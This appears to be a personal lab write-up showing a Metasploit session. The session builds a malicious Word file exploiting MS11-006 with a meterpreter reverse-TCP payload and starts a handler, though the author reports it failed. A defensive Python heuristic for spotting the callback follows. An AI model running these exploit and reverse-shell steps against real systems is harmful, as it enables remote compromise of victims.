Because BT5 R3 failed, I switched to BT5 R1.
msf > use windows/fileformat/ms11_006_createsizeddibsection
msf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms11_006_createsizeddibsection) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf exploit(ms11_006_createsizeddibsection) > set LPORT 443
LPORT => 443
msf exploit(ms11_006_createsizeddibsection) > set OUTPUTPATH /opt/framework/msf3/data/exploits/
OUTPUTPATH => /opt/framework/msf3/data/exploits/
msf exploit(ms11_006_createsizeddibsection) > show options
Module options (exploit/windows/fileformat/ms11_006_createsizeddibsection):

   Name        Current Setting                     Required  Description
   ----        ---------------                     --------  -----------
   FILENAME    msf.doc                             yes       The file name.
   OUTPUTPATH  /opt/framework/msf3/data/exploits/  yes       The output path to use.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.11     yes       The listen address
   LPORT     443              yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf exploit(ms11_006_createsizeddibsection) > exploit
[*] Creating 'msf.doc' file ...
[*] Generated output file /opt/framework/msf3/data/exploits/msf.doc
msf exploit(ms11_006_createsizeddibsection) >
This generated msf.doc; copy the file into the XP virtual machine.
Then, in BT5, enter the commands:
msf exploit(ms11_006_createsizeddibsection) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.11:443
[*] Starting the payload handler...
msf exploit(handler) >
I opened msf.doc, but BT5 did not get a shell. Maybe it is because the XP is not an English version. Tomorrow I will try an English XP.
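As an added defender-side example (it is not part of the original post and not Metasploit code): the handler above listens on port 443 so that the meterpreter callback looks like ordinary HTTPS, which is why a useful check keys on which process opened the connection rather than on the port. The Python below parses constructed Sysmon-style network-connection records and flags an outbound connection to a web port from a process that is not an expected web client. The record layout, the allowlist, the timestamps and the choice of explorer.exe as the process carrying the payload in the sample are all assumptions made for this example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Workstation processes expected to open outbound web connections.
# Constructed allowlist for this example; a real one comes from baselining.
EXPECTED_WEB_CLIENTS = {"iexplore.exe", "firefox.exe", "chrome.exe", "outlook.exe"}

# Ports a reverse payload is commonly pointed at to blend in with web traffic;
# the handler in the post listens on 443.
WEB_PORTS = {80, 443}

# Hypothetical Sysmon-style "network connection" export, one event per line.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) NetworkConnect Image=(?P<image>.+?) Protocol=tcp "
    r"Initiated=(?P<initiated>true|false) DestIp=(?P<ip>\S+) DestPort=(?P<port>\d+)$"
)


@dataclass
class NetEvent:
    ts: str
    image: str        # full path of the process that owns the socket
    initiated: bool   # True when the local host opened the connection
    dst_ip: str
    dst_port: int


def parse_line(line: str) -> Optional[NetEvent]:
    """Parse one constructed log line; return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return NetEvent(m["ts"], m["image"], m["initiated"] == "true", m["ip"], int(m["port"]))


def is_suspicious(ev: NetEvent) -> bool:
    """Outbound connection to a web port from a process with no business making one."""
    proc = ev.image.rsplit("\\", 1)[-1].lower()
    return ev.initiated and ev.dst_port in WEB_PORTS and proc not in EXPECTED_WEB_CLIENTS


def find_suspicious(log_text: str) -> List[NetEvent]:
    """Return every event in the log that trips the heuristic."""
    events = [e for e in (parse_line(line) for line in log_text.splitlines()) if e]
    return [e for e in events if is_suspicious(e)]


# Constructed sample: a normal browser session, the payload callback to the
# handler from the post (192.168.1.11:443), and an inbound SMB connection.
SAMPLE_LOG = """\
2011-05-01T10:00:01 NetworkConnect Image=C:\\Program Files\\Internet Explorer\\iexplore.exe Protocol=tcp Initiated=true DestIp=203.0.113.10 DestPort=443
2011-05-01T10:00:05 NetworkConnect Image=C:\\WINDOWS\\explorer.exe Protocol=tcp Initiated=true DestIp=192.168.1.11 DestPort=443
2011-05-01T10:00:06 NetworkConnect Image=C:\\WINDOWS\\system32\\svchost.exe Protocol=tcp Initiated=false DestIp=192.168.1.5 DestPort=445
"""

if __name__ == "__main__":
    for ev in find_suspicious(SAMPLE_LOG):
        print(f"{ev.ts} {ev.image} -> {ev.dst_ip}:{ev.dst_port}")
```

Only the explorer.exe line is reported: the browser is on the allowlist and the svchost.exe event is inbound. An allowlist like this is only as good as the baseline behind it, so in practice it is paired with process-creation events (which process spawned the one making the connection) rather than used on its own.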